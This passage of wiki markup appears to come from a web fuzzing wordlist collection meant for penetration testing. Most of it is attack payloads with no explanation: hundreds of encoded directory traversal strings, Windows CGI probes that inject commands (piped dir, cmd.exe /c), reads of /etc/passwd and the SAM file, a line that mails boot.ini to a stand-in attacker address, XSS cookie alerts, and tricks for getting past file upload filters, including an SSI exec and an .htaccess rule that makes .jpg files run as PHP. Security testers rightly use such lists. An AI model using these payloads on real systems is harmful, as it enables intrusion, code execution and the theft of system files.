..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI   (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (Update: 17 March 2010)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
